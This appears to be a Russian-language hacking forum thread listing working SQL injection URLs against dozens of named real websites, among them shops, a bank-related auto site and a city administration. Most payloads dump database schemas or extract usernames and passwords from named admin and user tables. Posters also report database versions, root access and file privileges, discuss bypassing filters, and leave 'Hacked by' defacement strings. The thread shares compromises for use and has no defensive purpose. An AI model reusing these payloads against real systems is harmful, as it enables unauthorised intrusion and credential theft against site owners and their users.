SQL Инъекции

ПриватБанк Авто

Code:

http://privat-auto.info/index.php?region=-1+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+

См. исходный код 7 строку.
Pyramid CAr

Code:

http://www.pyravastuconsultant.in/pyramid-car.php?id=1+union+select+1,2,3,4,5,6,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28pyravast_pyravast.user_m%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,user_name,0x3a,password%29%29%29%29x%29+--+

Авто в аренду

Code:

http://www.elitetrans.com.ua/car.php?show=category&id=-6+union+select+1,2,3,4,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

Греко-католики

Code:

http://www.mgce.uz.ua/category.php?id=14+union+/*!select*/+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,3+--+

Ювелирсервис

Code:

http://www.js.dn.ua/item.php?id=6&ref_item=133%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27/

5.1.61
=========================================
ELKOPLAST

Code:

http://elkoplast.ua/pro.php?id=30%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27

Версия:5.5.31

БукВица

Code:

http://www.bookvica.com.ua/shop.php?id=300+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28bookvica_bookvica.users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,pass%29%29%29%29x%29,3,4,5,6,7,8,9,10,11,12,13+--+

 

===========================================

===========================================

 

Comedy Club Kuban STYLE - как я их ненавижу, если честно!

Code:

http://comedykuban.ru/news.php?news_id=-17%27+union+select+1,0x472e4d61727469726f7379616e202d20332c313464617220436f204c74642e,3,4+--+

Версия: 5.5.30-30.2-log
=============================================
Интернет-магазин ТехноСектор

Code:

http://www.tes-ua.com/catalog.php?cat_id=29&brend=-180%29+union+select+1,2,3,4,5,6,7,8,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+

 

Code:

http://www.mtosmt.org/mto-announce.php?id=-120+union+select+1,concat_ws(0x3a,version(),user(),database()),3,0x4861636b6564206279205365706f,5--

Code:

http://www.nau.in/announce.php?id=-595+union+select+1,0x4861636b6564206279205365706f,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10--

 

Code:

http://www.bjp-bg.com/paper.php?id=-5%20union%20select%201,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--

 

Фотограф Andre Arment

Code:

http://www.andrearment.com/cat.php?id=-3'+union+select+1,2,3,(select(@x)from(select(@x:=0x00),(select(null)from(andrearm_db.members)where(0x00)in(@x:=concat(@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29,5+--+

NOTE: См. исходный код 67 строка.

===============================================

Салон Аудио-Видео Триумфальная Арка

Code:

http://www.arka-hitech.com.ua/cat.php?id=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+

4.1.25-log

===============================================
Официальный сайт Харькова

Code:

http://www.kharkov.ua/internet.php3?categ=-25+union+select+1,2,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28khadm.clients%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,email,0x3a,clientusername,0x3a,clientpassword%29%29%29%29x%29,4,5,6,7,8+--+

BrilliantStudents.com

Code:

www.brilliantstudent.in/games.php?id=-2+union+/*!select*/+1,2,/*!table_name*/,4,5,6,7+/*!from*/+/*!information_schema.tables*/+/*!limit*/+4,20+--+

Note: Не смог вывести данные из таблицы bs-admin

Dracodes - GAMES или фильтр "грубой очистки".

Code:

http://www.dracoders.com/games.php?id=-7+/*!union*/+select+1,2,3,4,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28Sql286973_1.jos_users%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,username,0x3a,password%29%29%29%29x%29+--+

Marim.IT

Code:

http://www.marim.it/games.php?id=494%20and%20%281,1%29%3E%28select%20count%28*%29,concat%28%28select%20version%28%29%20%29,0x3a,floor%28rand%28%29*2%29%29%20x%20from%20%28select%201%20union%20select%202%29%20a%20group%20by%20x%20limit%201%29%23

Версия: 5.0.51a-24+lenny4:0
AutoDiv

Code:

http://autodiv.rs/auto.php?id=1187%27+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+--+

Версия: 5.1.53

JobMan.Ru

Code:

http://www.jobman.ru/html/doc.php?id=30+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+

Novikovi.info

Code:

http://novikovi.info/man.php?id=-73+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,2,3,4,5+--+

ЛАСМЕТ - Лаборатория специальной металлургии!

Code:

http://www.lasmet.ru/steel/mark.php?s=-50+union+select+1,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28lasmet18_db2.admin%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,login,0x3a,passwd%29%29%29%29x%29,3,4,5,6,7,8,9,10,11,12,13,14,15+--+

:: fmaurer ::

Code:

http://www.fmaurer.com/index.php?category_id=-5+union+select+1,2,3,4,5,6,7,version%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+

Версия: 5.0.51a-24+lenny5

Маршрутизаторы Axesstel

Code:

http://www.axesstel.com/index.php?section=product&subsection=product_category&category_id=15+aND+1=0+UNION+SELECT+1,2,VERSION%28%29,4,5,6,7,8,9,10+--+

Версия: 4.1.22-standard-log

ЭКОМ - Общественное обсуждение градостроительных объектов

Code:

http://ecom.su/city_building/index.php?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+

P.S Не забываем убирать пробелы!

 

Code:

http://www.sostrader.it/sostrader/didattica1.cfm?id=2+and+1=0+union+all+select+1,2,@@version/*

 

UP

===============================================
pr=1

===============================================
pr=3

===============================================
pr=3

===============================================

===============================================
pr=6

===============================================
pr=3

===============================================

 

тиц = 300

File_priv = Y

 

Code:

http://www.toddjobs.com/job.php?ID=-97+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database(),0x4861636b6564206279205365706f),7,8,9,10,11,12,13,14--

 

pr=3

===============================================

 

country.ua
14к траффик

PS нужно авторизоваться
PSS хз где админка)

 

1234

 

ej.ru

PHP:

http://ej.ru/articles/?a=24&id=17+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+

 

тиц 190

root@localhost

 

===============================================

 

http://murtet.ru/index.php?page=-norders'+union+select+version()+--+

 

===============================================

===============================================

 

Code:

http://addcs.vpn.by/view.php?bg=3C3A36&text=9a9a9a&link=ffffff&ip=ffffff&m=1&id=-800+union+select+1,2,3,4,admin_name,admin_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+csmon.amx_admin+limit+0,1+--+

почемуто не грузится с словом concat в запросе
хавиж и sqlmap не хотят дампить
пришлось руками крутить =(

 

Big Криуз (фильтр на вывод данных)

Code:

http://www.bigcruise.ru/company/?id=-40%27+union+select+1,2,version(),4,5,6+--+

Версия: 5.1.70-log

Строймат

Code:

http://www.stroymat.net/index.php?sectID=-6+union+select+1,2,3,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,5,6,7,8+--+

Магазин пиломатериалов (имеет много баз)

Code:

http://wood-group.ru/index.php?sectID=-179+union+select+1,2,3,4,5,6,7,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,9+--+

OPMPlus Москва

Code:

http://www.opmplus.ru/index.php?gID=-165+union+select+1,2,3,4,version%28%29,6,7,8,9+--+&sectID=6

Версия: 5.1.52-log

DD2DDS (не могу обойти фильтр )

Code:

http://www.dds2dds.com/index.php?sect_id=12&site_num=1%27+union+select+1,2,3,4,5+--+

SALE.KHARKOV.UA

Code:

http://www.sale.kharkov.ua/advinfo.php?postid=146+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,version%28%29,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+

Версия: 5.0.91-log (базу не смогу вытянуть из-за фильтрации)

БЛОК-ХАУС

Code:

http://www.blok-haus.ru/index.php?sectID=-1+union+select+1,version%28%29+--+

Версия: 5.1.52-log

Администрация Ейского Района

Code:

http://rayon.yeisk.su/trades/index.php?p_id=-466+union+select+1,2,3,4,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29,6,7+--+

Lion-Expo.Ru

Code:

http://lion-expo.ru/index.php?sectID=781+union+select+1,version%28%29,3,4,5,6,7,8+--+

Версия: 5.5.33-cll-lve

ОАО "Стеклозавод" "НЕМАН" или как разбить все стёкла.

Code:

http://www.neman.by/ru/index.php?section_id=-125+union+select+%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28information_schema.columns%29where%28table_schema!=0x696e666f726d6174696f6e5f736368656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name%29%29%29%29x%29+--+